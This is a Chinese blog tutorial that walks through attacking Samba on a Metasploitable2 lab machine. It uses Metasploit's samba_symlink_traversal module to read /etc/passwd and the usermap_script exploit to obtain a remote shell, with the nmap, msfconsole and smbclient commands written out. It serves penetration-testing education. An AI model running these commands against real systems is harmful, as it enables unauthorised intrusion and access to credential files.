Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >【端口渗透】139和445的Samba后门漏洞

【端口渗透】139和445的Samba后门漏洞

作者头像
用户1467662
发布于 2018-03-30 04:32:14
发布于 2018-03-30 04:32:14
20.7K2
举报
文章被收录于专栏:农夫安全农夫安全

0x00 samba后门文件读取

利用139和445Samba后门漏洞攻击Metasploitable2靶机

(1)第一步,在kali linux中启用metasploit

操作:打开kali linux的命令控制台,输入msfconsole。

实验现象截图:

(2)使用扫描工具nmap对目标靶机进行扫描

操作:msf > nmap -sS -A -Pn 192.168.1.145

实验现象截图:

由扫描结果可见,该操作系统正运行这Samba3.x服务,该服务当配置为文件权限可写同时"wide links" 被允许(默认就是允许),同样可以被作为后门而不仅仅是文件共享

(3)由扫描结果可见,该操作系统正运行这Samba3.x服务,该服务当配置为文件权限可写同时"wide links" 被允许(默认就是允许),同样可以被作为后门而不仅仅是文件共享。通过共享尝试连接靶机,只能看到被共享的文件夹

操作:smbclient –L //192.168.1.145

实验现象截图:

(4)加载Samba后门的攻击模块auxiliary/admin/smb/samba_symlink_traversal

操作:msf > use auxiliary/admin/smb/samba_symlink_traversal

实验现象截图:

(5)使用show optation查看配置选项

操作:msf auxiliary(samba_symlink_traversal) > show options

实验现象截图:

从show option输出的结果来看,还需要设置RHOST(靶机)ip地址和SMBSHARE(共享的文件夹)

(6)设置RHOSH,SMBSHARE参数

操作:msf auxiliary(samba_symlink_traversal) > set rhost 192.168.1.145

msf auxiliary(samba_symlink_traversal) > set smbshare tmp

实验现象截图:

(7)使用exploit命令初始化攻击环境,并开始对目标靶机进行攻击尝试

操作:msf auxiliary(samba_symlink_traversal) > exploit

实验现象截图:

(8)验证后门

操作:root@kali:~# smbclient //192.168.1.145/tmp

smb: \> cd rootfs\

smb: \> cd etc\

smb: \> rootfs\etc\> more passwd

实验现象截图:

0x01 Samba缓冲区溢出

利用Samba缓冲区漏洞攻击Metasploitable 乌班图靶机

(1)在kali linux中启用metasploit

操作:打开kali linux的命令控制台,输入msfconsole。

实验现象截图:

(2)使用扫描工具nmap对目标靶机进行扫描

操作:msf> nmap –sS –A --script=vuln -Pn 192.168.1.145

实验现象截图:

由扫描结果可见,该操作系统为ubuntu,正运行这Samba3.x服务和Apache 2.2.3服务。猜测可能存在samba服务远程溢出漏洞,尝试通过该端口建立一个meterpreter 会话,需要用到metasploit。

(3)加载Samba缓冲区溢出漏洞攻击模块 exploit/multi/samba/usermap_script

操作:msf > use multi/samba/usermap_script

实验现象截图:

(4)使用show optation查看配置选项

操作:msf exploit(usermap_script) > show options

实验现象截图:

从show option输出的结果来看,还需要设置RHOST(靶机)ip地址。

(5)设置RHOST参数

操作:msf exploit(usermap_script) > set rhost 192.168.1.145

实验现象截图:

(6)使用exploit命令初始化攻击环境,并开始对目标靶机进行攻击尝试

操作:msf exploit(usermap_script) > exploit

实验现象截图:

已成功建立shell会话,可通该界面对靶机进行控制

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-10-31,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
2 条评论
热度
最新
为什么我的连接不成功呢smbclient -L //172.168.20.177do_connect: Connection to 172.168.20.177 failed (Error NT_STATUS_IO_TIMEOUT)
为什么我的连接不成功呢smbclient -L //172.168.20.177do_connect: Connection to 172.168.20.177 failed (Error NT_STATUS_IO_TIMEOUT)
回复回复点赞举报
这个漏洞一定要139和445同时开启才能使用吗
这个漏洞一定要139和445同时开启才能使用吗
回复回复点赞举报
推荐阅读
编辑精选文章
换一批
渗透测试中SMB服务(139、445端口)枚举汇总
# msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc"
字节脉搏实验室
2020/04/16
2.5K0
Metasploitable2使用指南
Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。(注:一个关于如何安装的视频教程已经可以访问在Virtual Box Host中安装Metasploitable 2
FB客服
2018/02/02
3.8K0
Metasploitable2使用指南
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
Meterpreter的功能丰富,例如添加用户、隐藏某些内容、打开shell、获取用户密码、上传和下载远程主机的文件、运行cmd.exe、捕捉屏幕、获取远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等。此外,Meterpreter可以躲避入侵检测系统,在远程主机上隐藏自己,不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统)很难对它做出响应。
用户8909609
2023/12/27
17.5K0
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
Kali Linux 网络扫描秘籍 第六章 拒绝服务(二)
NTP 放大 DoS 攻击利用响应远程 monlist 请求的网络时间协议(NTP)服务器。 monlist 函数返回与服务器交互的所有设备的列表,在某些情况下最多达 600 个列表。 攻击者可以伪造来自目标 IP 地址的请求,并且漏洞服务器将为每个发送的请求返回非常大的响应。 在写这本书的时候,这仍然是一个常见的威胁,目前正在大规模使用。 因此,我将仅演示如何测试 NTP 服务器,以确定它们是否将响应远程 monlist 请求。 补丁程序可用于大多数 NTP 服务来解决此问题,并且任何有存在漏洞的设备应该修复或下线。
ApacheCN_飞龙
2022/12/01
1.5K0
Kali Linux 网络扫描秘籍 第八章 自动化 Kali 工具
Kali Linux 渗透测试平台提供了大量高效的工具,来完成企业渗透测试中所需的大多数常见任务。 然而,有时单个工具不足以完成给定的任务。 与构建完全新的脚本或程序来完成具有挑战性的任务相比,编写使用现有工具以及按需修改其行为的脚本通常更有效。 实用的本地脚本的常见类型包括用于分析或管理现有工具的输出,将多个工具串联到一起的脚本,或者必须顺序执行的多线程任务的脚本。
ApacheCN_飞龙
2022/12/01
5.4K0
Kali Linux 秘籍 第六章 漏洞利用
一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识来尝试利用目标系统上的漏洞。这一章中,我们会使用不同的工具来操作,包括系统测试的瑞士军刀 Metasploit。
ApacheCN_飞龙
2022/11/27
8760
Metasploit 学习记录
一直在用 Metasploit,但是从来没有花时间仔细去研究这个工具,最近得空就系统的研究研究,故于此记录之。
小简
2023/01/04
2.4K0
Metasploit 学习记录
渗透第一课:尝试渗透
​ Metasploit框架中含有数百个模块,当然无法用“脑子”,也没有功夫去记所有的模块(除非很闲),当然了,一些比较基础的还是需要记住的了。
Mirror王宇阳
2020/11/13
5350
渗透第一课:尝试渗透
Metasploit实战
因为kali是134,目标靶机是在kali开启后进行挂载的,可以直接判断为地址要大于134
h3110_w0r1d
2024/03/23
2310
Metasploit实战
Kali Linux 网络扫描秘籍 第五章 漏洞扫描
尽管可以通过查看服务指纹的结果,以及研究所识别的版本的相关漏洞来识别许多潜在漏洞,但这通常需要非常大量时间。 存在更多的精简备选方案,它们通常可以为你完成大部分这项工作。 这些备选方案包括使用自动化脚本和程序,可以通过扫描远程系统来识别漏洞。 未验证的漏洞扫描程序的原理是,向服务发送一系列不同的探针,来尝试获取表明漏洞存在的响应。 或者,经验证的漏洞扫描器会使用提供所安装的应用,运行的服务,文件系统和注册表内容信息的凭证,来直接查询远程系统。
ApacheCN_飞龙
2022/12/01
5.7K0
Kali Linux 网络扫描秘籍 第五章 漏洞扫描
【端口渗透】21端口vsftpd服务后门
准备写一个专门关于端口渗透的一些小集合,每一篇代表一个端口对应的渗透方法,算不上什么牛逼的技术,但是对于实战时候还是具有一定的参考价值,之前已经发放了大概4-5枚的知识星球邀请码,如想加入可扫描二维码或直接来稿。 0x01 21端口 >use auxiliary/scanner/ftp/ftp_version探测版本 >search vsFTPd 2.3.4 版本号>use exploit/unix/ftp/vsftpd_234_backdoor>show options 0x02 后门 (1)在
用户1467662
2018/03/30
5.2K0
【端口渗透】21端口vsftpd服务后门
CVE-2019-0708漏洞检测利用
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。
Gamma实验室
2020/12/23
1.5K0
CVE-2019-0708漏洞检测利用
MS17_010漏洞利用,渗透win7,拿到桌面的flag
我们先ping一下win7的ip看看是否可以ping通(ping不通的可以关闭win7的防火墙),然后我们用nmap扫一下看看靶机有什么漏洞
Anime_Bucket
2022/08/23
1.1K0
MS17_010漏洞利用,渗透win7,拿到桌面的flag
黑客玩具入门——4、漏洞扫描与Metasploit
Legion是Sparta的一个分支,它是一个开源的、易于使用的、超级可扩展的、半自动的网络渗透测试框架。它是一款Kali Linux系统默认集成的Python GUI应用程序工具。Legion是一个Nmap、Nikto、Hydra等工具的集合,利用各个工具的优秀功能,完成收集信息、扫描和爆破等任务。
zaking
2023/12/01
2.8K0
黑客玩具入门——4、漏洞扫描与Metasploit
工具的使用 | Metasploit Framework(MSF)的使用
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
谢公子
2022/01/13
2.7K0
工具的使用 | Metasploit Framework(MSF)的使用
网络空间安全之一个WH的超前沿全栈技术深入学习之路(13-3)红队必经之路——实战如何用Metasploit 渗透她的Win主机并远程执行命令才不会让我释怀[竟然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
1170
网络空间安全之一个WH的超前沿全栈技术深入学习之路(13-3)红队必经之路——实战如何用Metasploit 渗透她的Win主机并远程执行命令才不会让我释怀[竟然是红队,那就对自己狠一点]
永恒之蓝漏洞入侵_永恒之蓝漏洞探测
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
全栈程序员站长
2022/11/03
1.3K0
永恒之蓝漏洞入侵_永恒之蓝漏洞探测
MSF学习(一)
msf全称Metasploit Framework,是一款功能强大的开源渗透测试工具,它提供了丰富的漏洞利用模块、扫描工具、Payload生成器和框架等功能。MSF最初由HD Moore于2003年创建,现在由Rapid7维护和发展。 因为msf是一个框架,所以可以根据自己的需求进行功能开发。
cultureSun
2023/07/08
3600
MSF学习(一)
使用msf入侵多层级网络架构
假设,有一个多层网络环境,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本层层突破,获取到第4层靶机Server5的系统权限呢?
Bypass
2020/06/04
1K0
ms-17-010漏洞复现
EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。
R0A1NG
2022/02/19
1.1K0
推荐阅读
相关推荐
渗透测试中SMB服务(139、445端口)枚举汇总
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档